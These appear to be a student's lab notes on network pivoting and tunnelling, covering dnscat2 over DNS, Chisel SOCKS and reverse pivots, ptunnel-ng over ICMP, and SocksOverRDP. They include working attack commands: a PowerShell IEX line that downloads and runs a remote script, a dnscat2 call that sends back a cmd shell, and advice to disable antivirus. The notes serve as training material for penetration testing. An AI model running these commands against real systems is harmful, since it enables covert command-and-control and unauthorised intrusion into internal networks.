Branching out our tunnels
DNS tunneling Dnscat2
Dnscat2 is a tunnelling tool that utilizes DNS protocols to send data between two hosts
it uses an encrypted C2 channel and sends data inside TXT records within the DNS protocol
In dnscat2, when address resolution is requested from an external server, it typically involves the compromised system (agent or implant) making DNS queries to the dnscat2 server to resolve domain names. The DNS protocol, which is normally used to translate human-readable domain names into IP addresses, is repurposed to carry covert communication between the compromised system and the command-and-control (C2) server.
example
we will download the dnscat2 repo
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
we can start a Dnscat2 server on our local machine (attacking machine) by executing the dnscat2 file
sudo ruby dnscat2.rb --dns host=10.10.14.26,port=53,domain=inlanefreight.local --no-cache

After we have the server running, this will provide us with a sercret key, which we will have to provide to the dnscat2 client when we deploy it on the windows client, this key essentailly handles authenticates and encrypts the data that is sent to our external dnscat2 server
we can utilize the dnscat-powershell, a dnscat2 compatible PowerShell client that we can run from windows targets to establish a tunnel with our dnscat2 server, lets clone the project
sudo git clone https://github.com/lukebaggett/dnscat2-powershell.git
currently i have a rdp session on the already compromised host, Now we need to import the
dnscat2.ps1
module onto the system
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.26/dnscat2.ps1')

Now that dnscat2,ps1 is imported, we can now use it to establish a tunnel with the server running on our attack host, we can send back a cmd shell session to our server
Start-Dnscat2 -DNSserver 10.10.14.26 -Domain inlanefreight.local -PreSharedSecret 938a1271da9a24b62250e22e7aeef915 -Exec cmd

if we look back at our dnscat2 server we can see we got a successful hit, and we have a shell on the system

SOCKS5 tunnelling with Chisel
chisel is a TCP/UDP-based tunnelling tool written in go, that uses HTTP to transport data that is secure using SSH
scenario
We have compromised a public-facing server (ubuntu machine) and we want to pivot into the internal subnet of 172.16.5.0/23, since we have already compromised the public facing server we can use this as a chisel server (pivot point) which will listen on a specific port and forward our traffic to the internal subnet of 172.16.5.0/24 through an established tunnel
Setting up chisel, clone repo, build binary
#cloen the repo
sudo git clone https://github.com/jpillora/chisel.git
#building the chisel binary
cd chisel
sudo go build
Now that our binary is built we can transfer it to the compromised host (pivot point)
Running our chisel server (pivot host)
./chisel server -v -p 1234 --socks5
(error) we did come acrss the following error, when we try to deploy the chisel server on the pivot host
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
easy fix, just download an older version of chisel from
sudo https://github.com/jpillora/chisel/releases/tag/v1.7.4
sudo gzip -d chisel_1.7.4_linux_amd64.gz
mv chisel_1.7.4_linux_amd64 chisel
sudo chmod +x chisel
Now our chisel server will listen for incoming connections on port 1234 using SOCKS5 and forward it out to all the networks that are reachable from the pivot host.

We can now start our chisel client (us, attack host) and connect to the chisel server (pivot host)
./chisel client -v 10.129.130.77:1234 socks

within the chisel output we should see where chisel specified a local port on our machine (attack host) that's listening for incoming traffic, from here we can make a new entry into our / /etc/proxychains.conf
file
directing proxychains to our clients listening port

we should be able to interact with the internal subnet
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot
Now there may come in the future where say firewall rules restrict inbound connections to our compromised targets, in such cases we can use Chisel with the reverse option enabled
--reverse
starting the Chisel server on our attack host
sudo ./chisel server --reverse -v -p 1234 --socks5

then we can can connect from our public facing server we have compromised (pivot host) to our attack host (chisel server) using the R:socks
option
Connecting the Chisel client to our attack host
./chisel client -v 10.10.14.26:1234 R:socks
Now we can configure our
/etc/proxychains.conf
file

Now we should have the ability to interact with the internal subnet
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

ICMP Tunnelling with SOCKS
ICMP tunnelling encapsulates our traffic with ICMP packets containing echo requests and responses
ICMP tunnelling will only work when ping responses are permitted within the firewalled network
When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server m then the external server can validate this traffic and send an appropriate response, which proves very useful for data exfiltration and creating pivoting tunnels to an external server.
For this we will utilize the
ptunnel-ng
tool to create a tunnel between the external facing server (ubuntu) and our attack host (us), from which we should be able to proxy our traffic through theptunnel-ng client
lets set up ptunnel-ng on our host machine
sudo apt-get install ptunnel-ng
we can copy the binary into our working directory
cp /usr/bin/ptunnel-ng ./
Lets transfer the tool to our pivot host (ubuntu)
scp -r ptunnel-ng ubuntu@10.129.130.77:~/
Now with ptunnel on our pivot host we can start the server-side of the ICMP tunnel on our pivot host
sudo ./ptunnel-ng -r10.129.130.77 -R22
-r
: should be the IP we want ptunnel-ng to accept connections on-R
: specifying the port for our attack machine to connect to
Within our attack machine (us) we can no connect to the ptunnel-ng server
sudo ptunnel-ng -p10.129.130.77 -l2222 -r10.129.130.77 -R22
-p
: Specifying the IP address of the machine (our pivot host) running the ptunnel-ng server, this machine will receive our incoming requests-l 2222
: specifying the local port on our machine to listen for incoming connections, connecting through port 2222 allows us to send traffic through the ICMP tunnel-r
: specifies the IP address of the ptunnel-ng server to which the tunnelled connections will be forwarded-R
: Specifies the remote port on our ptunnel-ng server to which the tunnelled connection

with the tunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target through SSH through local port 2222
ssh -p2222 -lubuntu 127.0.0.1
we can also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various
Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
Now we can configure our proxychains file
RDP and SOCKS Tunnelling with SocksOverRDP
Often times during an engagement we may be limited to a windows network and may not have SSH enabled for pivoting, We should use tools available for Windows operating systems in these cases.
SocksOverRDP is an example of a tool that uses Dynamic Virtual Channels (DVC) from a Remote Desktop Service feature of windows
DVC is responsible for tunnelling packets over RDP connection, we can also utilize DVC to tunnel arbitrary packets over the network
We can use SocksOverRDP to tunnel our custom packets and then proxy through it
we can utilize tools such as Proxifier as our proxy server
Lets download the appropriate binaries to our attack host to perform this attack having the binaries on our attack host will allow us to transfer them to each target where needed

we should have both zip files on our attack host

lets connect to the target machine (pivot host) via RDP and copy the SocksOverRDPx64.zip file over
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.214.27
we can just copy and paste the zip files in our RDP session
we need to load the SocksOverRDP.dll using regsvr32.exe as administrator cmd.exe session
regsvr32.exe SocksOverRDP-Plugin.dll

we should receive the following prompt that our plugin is enabled, and it will listen on
localhost:1080
remember to disable real-time virus protection
Now we can connect to 172.16.5.19 (Domain controller, pivot host) over RDP using
mstsc.exe


Now we need to transfer over our
SocksOverRDP-Server.exe
we
copy and paste the file
Now we can run it in administrative cmd prompt
.\SocksOverRDP-Server.exe

We can confirm that we have a SOCKS listener on the workstation (pivot point, initial foothold) by running netstat

After starting our listener, we can now configure Proxifier on our initial foothold to forward all our packets from 127.0.0.1:1080
Profixier will route through the the given host and port
to configure Proxifier we need to click "Profile" -> "Proxy server" -> "Add" ->

With Proxifier configured and running, we can connect to the domain controller via RDP, and it will use Proxifier to pivot all of our won traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which then will route it to 172.16.6.155 using SocksOverRDP-server.exe
Last updated